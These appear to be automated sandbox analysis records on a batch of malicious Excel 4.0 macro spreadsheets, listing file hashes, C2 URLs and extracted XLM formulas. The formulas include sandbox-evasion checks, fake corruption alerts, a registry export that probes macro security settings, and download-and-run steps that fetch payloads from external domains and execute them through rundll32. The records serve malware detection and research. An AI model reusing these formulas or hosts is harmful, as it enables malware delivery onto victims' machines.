{"version":"0.2","sample":{"sample":"","kind":"file","target":"22992c435a55c878cc3ccd92188478a1d44da71a9dd28488bf108863c6fcf681"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"22992c435a55c878cc3ccd92188478a1d44da71a9dd28488bf108863c6fcf681","filesize":167936,"md5":"d45f95efe1fbcf76fa2f93c54b9e458d","sha1":"48e164593b0e38a6716656d8f8a9c02877123b7f","sha256":"22992c435a55c878cc3ccd92188478a1d44da71a9dd28488bf108863c6fcf681","sha512":"dac1395e5bb242a3a07160175736c40d4b2d13f9bbae032a2c730a9d5ec0c7a93c782dc45382eff960704ba0b30497951cc60a400dd2716f9e562e6893db0719","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22992c435a55c878cc3ccd92188478a1d44da71a9dd28488bf108863c6fcf681.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bpg4C4qQ3S\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"229c678f378b07d52b3b2a4eeda2217b11e50f906c39910b9b730d7faabf79a9"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"229c678f378b07d52b3b2a4eeda2217b11e50f906c39910b9b730d7faabf79a9","filesize":168448,"md5":"0818e4ce60490e26a87b99c790b1f22a","sha1":"2338026c0a2e24f8435b1fab24e8dcec911f6a92","sha256":"229c678f378b07d52b3b2a4eeda2217b11e50f906c39910b9b730d7faabf79a9","sha512":"37e172a80bb143178529b4ed0f556ed872bf9af4b231e5ab664dcdc3f6371236f8e7007b99292990e1e39bd7dfce433d44c13b7da28854eea0d8d7c6798e25e6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"229c678f378b07d52b3b2a4eeda2217b11e50f906c39910b9b730d7faabf79a9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JdmRVX1EvO\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22bb1293cfd109d0b8bd44d410f379deb8c4d02b095552b8954c6a75e5bc9ae9"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"22bb1293cfd109d0b8bd44d410f379deb8c4d02b095552b8954c6a75e5bc9ae9","filesize":221184,"md5":"ceb982ad025c2e244e929599b16b69b5","sha1":"37e150a66d6a9adad4455d39b7f35e76d1daa4f0","sha256":"22bb1293cfd109d0b8bd44d410f379deb8c4d02b095552b8954c6a75e5bc9ae9","sha512":"2c236604c4aead859d95cb16307074a5b0a35366b2b17e6d2dc0e406f479a53de8b3726989fa117f8b337e31044ffb3a2449245368f849b122da8f80296c89fb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22bb1293cfd109d0b8bd44d410f379deb8c4d02b095552b8954c6a75e5bc9ae9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NwdFvU2zLF\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22c407cfa362a1aebbbdb6613d5e8742787dd95b77f313b79bc7166d08b4d116"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"22c407cfa362a1aebbbdb6613d5e8742787dd95b77f313b79bc7166d08b4d116","filesize":112128,"md5":"9f8a50bad2924a86c437c3828677cbe7","sha1":"6683e3d3d2a7ca55f7a2ac57001c6fca1cbc4b34","sha256":"22c407cfa362a1aebbbdb6613d5e8742787dd95b77f313b79bc7166d08b4d116","sha512":"2bc311ad8b69d87633d4e3339881616f26c27549c3cfe852c1efd0fbb7e7a7d4e0496bc831e7e7328bdb9f2389f4ffdb503cd212e7e5e5136af8583566a72976","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22c407cfa362a1aebbbdb6613d5e8742787dd95b77f313b79bc7166d08b4d116.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22c8c5f9aff0d4e9b0d765583a595f7184b54340e2b4fb2d76b26b8629b33f80"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"22c8c5f9aff0d4e9b0d765583a595f7184b54340e2b4fb2d76b26b8629b33f80","filesize":167936,"md5":"655bc7590b96dfe585de1535ed9e2f59","sha1":"40ae509e91b0cd84b6c2b9de9b949398739b088e","sha256":"22c8c5f9aff0d4e9b0d765583a595f7184b54340e2b4fb2d76b26b8629b33f80","sha512":"64d5d79d120426dbbded8d76cb9c101acf7e12fc768ed66a112e0acb4f1a7d85a4742fa0014e600ba624ece3273a6c5fd3cb4df3100f262438a32233a4127259","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22c8c5f9aff0d4e9b0d765583a595f7184b54340e2b4fb2d76b26b8629b33f80.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZalZDt18HL\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22d08b1b3a917f03195ce8e4f932097516274e5f93a94bd906167beff86d3842"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"22d08b1b3a917f03195ce8e4f932097516274e5f93a94bd906167beff86d3842","filesize":141312,"md5":"940aecee092083c77ed72824d8aa2dc9","sha1":"30a994d0261bd198bcff5aec717e230a47cc425d","sha256":"22d08b1b3a917f03195ce8e4f932097516274e5f93a94bd906167beff86d3842","sha512":"6d0c34172a6c887a8438c98db2de534d4d418bd4043d1ac343a5334fc9b6f359733af90eccc0ee2e16c798108b21f3966170fbe017b5fbde950f5e1302217bba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22d08b1b3a917f03195ce8e4f932097516274e5f93a94bd906167beff86d3842.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"zIsdYI20yB\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22d0d78ad9c62ba4034588b98318b962db38cba2e0169479b44538757c6af6e0"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"22d0d78ad9c62ba4034588b98318b962db38cba2e0169479b44538757c6af6e0","filesize":209920,"md5":"0ed2c19f3fc3e0ae80f5655775cf58bc","sha1":"632ff1ab9eee25af7ef5ac1c0f0418de10bec822","sha256":"22d0d78ad9c62ba4034588b98318b962db38cba2e0169479b44538757c6af6e0","sha512":"10580ce1dc2a87605208c371c27c7bb3fe01ee37ccc1ecddac0e39b3e332acd766d54607e958ad227821235c2280dd478717c8e1b068d7d7c3cab21aca5e9fd3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22d0d78ad9c62ba4034588b98318b962db38cba2e0169479b44538757c6af6e0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YZhZeeFseC\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22e593c36bdfd18778609f555b3c246bfc8933193f30498667173cbd4b0814e9"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"22e593c36bdfd18778609f555b3c246bfc8933193f30498667173cbd4b0814e9","filesize":167424,"md5":"2370fd817a6b2e61c1675a90eeb39bc1","sha1":"b39b8e7690312ff471454386e75b431fc23a641d","sha256":"22e593c36bdfd18778609f555b3c246bfc8933193f30498667173cbd4b0814e9","sha512":"1601e5464b6b404cc9bc0317931e60a870e9d68f69ee6ea8eb0f4bf1db32bbfccaa971515901714daf0945b161e1c74d34ae7af91ebd87478bb7af76cc8cf4c5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22e593c36bdfd18778609f555b3c246bfc8933193f30498667173cbd4b0814e9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"TogiYmhK3P\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22e895d949b05239208b61a40c67404c77d6bbc8e60bd756e4e70452a8426a0d"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"22e895d949b05239208b61a40c67404c77d6bbc8e60bd756e4e70452a8426a0d","filesize":185344,"md5":"d01139eed0a772aa182502d0948fe4b7","sha1":"e031f3ecd2521282e4f9768c0901a2d1d5e48cbe","sha256":"22e895d949b05239208b61a40c67404c77d6bbc8e60bd756e4e70452a8426a0d","sha512":"ae3009204c8d8dbe23c39209bf2b2d94698e686940cc94b4de83d97dbe7a71281cc86d92ccab0143b26bfa104576fbb96e410c7fcf584f6f0d5feece2628058a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22e895d949b05239208b61a40c67404c77d6bbc8e60bd756e4e70452a8426a0d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22efb0b0b3006494c10abee54eb2d45e39a7d7a6d198b9480d47111326de2cfd"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"22efb0b0b3006494c10abee54eb2d45e39a7d7a6d198b9480d47111326de2cfd","filesize":214528,"md5":"590a849aba540ba6031ebf46cadaae10","sha1":"67d41ca3d285b80ffb883d2b9b042c3c8c134c8e","sha256":"22efb0b0b3006494c10abee54eb2d45e39a7d7a6d198b9480d47111326de2cfd","sha512":"3f74cf876e4b4a8b5c7814295f8504ea85e5b3548cdd892ad2be56b3f2319ade7ef7827a78d1aa07fd9c3992d48340cc280225fc461e1d5d36c96516a67bb247","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22efb0b0b3006494c10abee54eb2d45e39a7d7a6d198b9480d47111326de2cfd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XDndIeJRxA\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22fc97d4ea174b89660ae09de5055c06fc89567170695088e516cc3e923525a4"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"22fc97d4ea174b89660ae09de5055c06fc89567170695088e516cc3e923525a4","filesize":209920,"md5":"429452c5b3225623850641bab232b15a","sha1":"b8af57b1f546d8e3acd8434f2ea3d0af657c7c3e","sha256":"22fc97d4ea174b89660ae09de5055c06fc89567170695088e516cc3e923525a4","sha512":"ee29d87493260d9fdf3b3089a0ae27bd11cab2c8f78b976fee48ad0e144c806d09c1f4fb4a2c14ccb6c8ca6925897ab1a9ccb356bf061189704fef491d2f10e5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22fc97d4ea174b89660ae09de5055c06fc89567170695088e516cc3e923525a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"d1uWmrtkyF\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"22fec147884f6e8e23cf81e1836b550af90b6c80dd865be0af78352125b7fcf0"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"22fec147884f6e8e23cf81e1836b550af90b6c80dd865be0af78352125b7fcf0","filesize":206336,"md5":"e688b9795d447dd21c67c07f98d138b8","sha1":"20773febd04f14a4fd858296605cac4a12ea54cf","sha256":"22fec147884f6e8e23cf81e1836b550af90b6c80dd865be0af78352125b7fcf0","sha512":"f17efa2df4ac052302ca45c237a9506c7ca521c47fed390261a9a3e01062970162d8e7ebdc6edf64573095c183ba0eda1a3956b4dc4c6b004bab4e0a37302fee","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"22fec147884f6e8e23cf81e1836b550af90b6c80dd865be0af78352125b7fcf0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CpWbK2r0QV\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2302aa9a6b736adfe74b3a5c3a16d4a54de40227c861b4a7bfb98d27987d7b09"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"2302aa9a6b736adfe74b3a5c3a16d4a54de40227c861b4a7bfb98d27987d7b09","filesize":116224,"md5":"7938aa93cf6f2c2371c005d4bcd2164c","sha1":"1a360b0aec80ed34c7952a2d5ff5186f8952d4c0","sha256":"2302aa9a6b736adfe74b3a5c3a16d4a54de40227c861b4a7bfb98d27987d7b09","sha512":"86fb1ef625ff4056cb7a865a4ba2f763c2fe0c1357fcc504629006dd29e743b678922739c65a00484701ce2a10ade0f43a6f29e298f6c28ed48314f37e96d634","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2302aa9a6b736adfe74b3a5c3a16d4a54de40227c861b4a7bfb98d27987d7b09.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cj6HkS9kD2\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"230506fa8df4cc6195febb3982cc941c317f4cdb95f0606d72b6d23d839b09e6"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"230506fa8df4cc6195febb3982cc941c317f4cdb95f0606d72b6d23d839b09e6","filesize":147968,"md5":"b8aef5dee5c9f003cbb1b75a47eb1b62","sha1":"33384cb08979cc258fae3db8966aa30356ba47e3","sha256":"230506fa8df4cc6195febb3982cc941c317f4cdb95f0606d72b6d23d839b09e6","sha512":"7c35052c733454ab8b6d829debbc7fd68d7e8bbe4f21b3432c84208676c47717703f9a621bcca8085f44d15cce53b0c330b626c5a29e2f25af6491f04b070054","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"230506fa8df4cc6195febb3982cc941c317f4cdb95f0606d72b6d23d839b09e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"B7HMpIORvx\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"23099320393eaf4a13dac8ca6f03c4f1de21978a7019b58c00331dc2c30f8fde"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"23099320393eaf4a13dac8ca6f03c4f1de21978a7019b58c00331dc2c30f8fde","filesize":185344,"md5":"a626204c5e40a1d91b3c20ff1e2ab4e1","sha1":"9f00f00faafff508cfc2f2f7c26ae8fc9db3c707","sha256":"23099320393eaf4a13dac8ca6f03c4f1de21978a7019b58c00331dc2c30f8fde","sha512":"1a3fa5ac0c9f1cc52755ab98c99ea80f575301ad2b2a6c98717e4eb43ae6a5bc58247abeb270b182b6d0685da1c67ed5021fa86f18bc8f93a9506ca53422583b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"23099320393eaf4a13dac8ca6f03c4f1de21978a7019b58c00331dc2c30f8fde.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
